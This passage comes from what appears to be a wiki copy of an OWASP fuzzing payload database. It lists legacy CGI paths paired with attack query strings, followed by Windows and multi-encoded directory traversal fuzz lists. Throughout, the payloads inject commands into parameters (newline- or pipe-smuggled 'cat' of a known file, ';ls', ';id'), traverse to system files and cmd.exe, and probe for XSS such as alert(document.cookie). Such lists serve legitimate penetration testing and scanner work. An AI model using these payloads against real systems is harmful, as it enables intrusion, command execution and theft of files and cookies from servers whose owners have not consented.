fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (77 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (7 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
